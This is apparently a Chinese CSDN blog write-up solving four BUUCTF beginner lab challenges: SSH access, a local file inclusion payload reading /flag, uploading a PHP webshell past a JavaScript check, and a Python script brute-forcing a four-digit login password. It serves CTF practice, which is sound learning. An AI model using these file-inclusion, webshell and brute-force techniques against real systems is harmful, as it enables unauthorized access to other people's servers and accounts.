BUUCTF basic Linux Labs & BUU LFI COURSE 1 & Upload-Labs-Linux & BUU BRUTE 1

已于 2023-05-30 11:23:00 修改
阅读量1.4k 收藏 2
点赞数 1
分类专栏: BUUCTF basic 文章标签: 安全
于 2022-08-25 16:46:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64558270/article/details/126527059
版权

目录

 

Linux Labs

BUU LFI COURSE 1

Upload-Labs-Linux

BUU BRUTE 1

 

Linux Labs

启动靶机发现什么也没有,读题感觉应该是需要ssh连接一个linux主机,打开kali虚拟机,根据给出的端口和地址写入linux指令。

ssh -p 25142 root@node4.buuoj.cn

75734cbb53104f28969a790ab86e6d6b.bmp

 ssh连接后先退回到根目录,发现有一个flag.txt,cat指令读取,拿到flag。

0002d68b1dfc4313a2e6618d6e047ced.bmp

BUU LFI COURSE 1

启动靶机,发现需要代码审计,运用文件包含,在url后面用问号传参来读取敏感文件。

?file=/flag

Upload-Labs-Linux

启动靶机,发现就是upload_labs的靶场,打开第一关,禁用js(火狐浏览器禁用步骤:新建页面搜索about:config,在页面中查找javascript.enable,把true改成false),上传php一句话木马,蚁剑连接后在根目录打开flag,这个题比较简单,结束后不要忘记启用js哦。

BUU BRUTE 1

启动靶机,发现是一个登录框,首先尝试弱密码admin/admin

e3c1213c9438491b9a8bde875b54f5cb.bmp

猜测用户名应该是正确,但密码是错误的,需要输入四位数字,把用户名改成admin1尝试

b57998c2eaac41de9afe65a89378a7df.bmp

 方法一:说明我们的猜测正确,直接打开burp抓包,用户名为admin,爆破四位数字的密码段。需要把线程调小一点。

方法二:这个我参照了大佬的方法,编写脚本:(需要改成自己的url)

import requests
from time import sleep
url = "http://8120f277-af07-42cb-8718-50ba405df6ae.node4.buuoj.cn:81/?username=admin1&password="
for i in range(6400, 7000):
    res = requests.get(url + str(i))
    sleep(0.01)
    print("[*] Try:", i)
    if res.text != "密码错误,为四位数字。":
        print(res.text)
        break

两个方法可以都尝试一下,第一个我设置线程为1的时候不会有任何报错。第二个直接用大佬的方法会不定时报错,我自己加了个sleep函数,测试几遍并没有问题

 

WmVicmE=
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
SQLi-LABS Page-1(Basic Challenges)1-22
安装upload-labs
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
一口气学完upload-labs 文件上传靶场
小小白勿喷
09-14 194
是专门针对文件上传的靶场。总共21关,现在搬起小板凳,让我们一起来学习吧!
BUUCTF base 第三题Upload-Labs-Linux1比较省事的方法
weixin_45708060的博客
06-03 1433
buuctf第三题Upload-Labs-Linux1
Upload-Labs-Linux_upload-labs-linux 1
06-21 212
6.获取 flag , 修改后的一句话木马,可直接访问以下 url 获取 flag。4.查看源码,禁用JavaScript ,并删除该内容。2.编写一句话木马上传。另存为【PHP】文件。注:禁用 JavaScript 可使用插件。3.发现报错,不允许上传.php文件。1.访问页面,文件上传靶场。5.文件上传成功,访问路径。
BUU basic模块 Upload-Labs-Linux 1
weixin_52942048的博客
10-06 530
【代码】BUU basic模块 Upload-Labs-Linux 1。
Upload-labs-文件上传(1-10)
qq_45927819的博客
01-20 2388
文章目录前言Pass-01-js绕过Pass-02-文件类型绕过Pass-03-其他可解析类型绕过Pass-04-上传.htaccess文件绕过方法一:方法二:Pass-05-.user.ini.绕过方法一:方法二:Pass-06-后缀大小写绕过即可Pass-07-空格绕过Pass-08-点绕过Pass-09-::$DATA文件流特性绕过Pass-010-多点和空格绕过 前言 文件上传的题就那么些类型,upload-labs1~10简单过一下 后面的随后再总结。 Pass-01-js绕过 可以修改前端js
BUU LFI COURSE 1
weixin_46601305的博客
01-24 619
BUUCTF 靶场 BUU LFI COURSE 1
BUUCTF平台练习题Upload-Labs-Linux1 wp
qq_23730003的博客
10-09 458
BUUCTF平台练习题Upload-Labs-Linux1 wp
Upload-labs通关的一些关键步骤和思路
最新发布
07-13
Upload-labs通关的一些关键步骤和思路
upload-labs-master.zip
06-22
【描述】描述中的 "文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master" 显示这是一个针对文件上传漏洞的系列练习,通过多次嵌套的目录结构,可能旨在模拟不同...
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集.zip
09-18
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集 lfi实验室用于实践开发 LFI 。RFI和CMD注入vulns的小型PHP脚本集为什么?用于培训和测试。 你可以测试检测产品( 比如 。 漏洞扫描器),利用工具等。这些不是用来评估appsec测试工具的。这个想法是将这些添加到
UPLOAD-LABS详细解题步骤
05-17
UPLOAD-LABS详细解题步骤 UPLOAD-LABS是一个网络安全靶场,旨在帮助用户练习文件上传的安全知识。该靶场提供了多个关卡,每个关卡都有一定的安全挑战和限制,旨在考验用户的安全知识和技术。 在开始之前,需要先...
upload-labs详解1-19关通关全解(最全最详细一看就会)
热门推荐
qq_53003652的博客
04-05 2万+
upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关,每一关都包含着不同上传方式。
Linux系统中upload第一关通关修改前端代码来上传其他类型文件
Make_me_lonely的博客
07-14 592
Linux系统中upload第一关通关修改前端代码来上传其他类型文件。 1.首先打开upload第一关界面,单机右键将页面代码下载下来,我这里保存的名字为upload-labs.html 2.然后复制该页面的网页 3.将下载下来的html文件upload-labs.html使用记事本打开,将其中的onsubmit="return checkFile()"删掉,改成action=" 之前复制的网页",我这里是action="http://10.22.8.70/Pass-01/index.php"..
BUUCTF在线评测之Linux Labs 1
weixin_49182737的博客
03-02 1万+
这个测试没什么技术要求,只要了解ssh以及linux系统即可 点击启动靶机,出现的页面 点击所给的http链接,得到如下界面 Index of 这个页面啥也没有,没啥用 返回第一个界面,给出了ssh 以及映射地址和端口(这个地址+端口是随机的) 所以直接启动ssh链接即可 however!!!这里要 banter一下BUUCTF网站的这个Linux Labs 1测试中的这句话 这句话,不仅是说主机可以访问,且只有主机可以访问!!! As we all know,我们最常用的Windows OS没有自带
BUUCTF Basic 解题记录--BUU LFI COURSE 1
weixin_43171033的博客
09-14 1058
BUUCTF Basic 解题记录--BUU LFI COURSE 1
BUUCTF/BUU LFI COURSE 1
weixin_44041994的博客
03-18 388
如果文件包含的代码文件被设计为一个变量,且这个变量可以由前端用户设置,这种情况下,如果没有做足够的安全过滤设置,则可能会引发文件包含漏洞。实际上可以通过文件包含漏洞查看系统的重要配置文件,这些文件地址一般都是固定的,比如可以查看Linux系统用户信息,/etc/passwd。仅能够对服务器本地的文件进行包含,该情况下,攻击者更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。file=/flag,得到flag。本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。1.本地文件包含漏洞。
Upload-Labs-Linux 1
07-27
- *1* *3* [BUUCTF basic Linux Labs & BUU LFI COURSE 1 & Upload-Labs-Linux & BUU BRUTE 1](https://blog.csdn.net/m0_64558270/article/details/126527059)[target="_blank" data-report-click={"spm":"1018....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值